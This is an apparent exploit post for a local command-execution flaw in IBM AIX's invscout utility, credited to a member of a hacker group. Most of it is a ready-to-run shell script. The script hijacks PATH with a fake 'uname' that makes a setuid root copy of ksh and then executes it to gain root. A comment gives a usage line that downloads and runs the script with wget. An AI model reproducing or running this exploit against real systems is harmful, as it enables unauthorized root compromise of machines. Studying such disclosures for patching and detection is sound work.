IBM AIX invscout Local ExploitSummary
Provided here is an exploit for the IBM AIX invscout Local Command Execution Vulnerability reported previously.
Credit:
The information has been provided by lord.
Details
Exploit Code:
#!/usr/bin/sh
# bash script by LorD from IHS
# Private IHS IRAN HACKERS SABOTAGE Private
# Special tnx to : My very good friend Arezoo and NT and C0d3r
# AIX invscout execute command then u can run commnad as root and get
L0cal r00t access
# Tested on : AIX 4.X 5.1 5.2 5.3
# id
# uid=99(nobody) gid=207(nogroup) euid=0(root) egid=0(system)
groups=1(other),205(admstaff),206(faculty)
# uname -a
# AIX neo1 2 5 000F7AAF4C00
# Bug found at :
http://www.idefense.com/application/poi/display?id=171 &type=vulnerabilities&flashstatus=true
# www.ihsteam.com www.ihssecurity.com
# IRC.IHSteam.com #IHS
# usage cd /tmp;wget www.site.com/lord chmod +x inv ./lord
# gives euid=0(root) and guid=0(system)
cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
推荐
评论(0条)
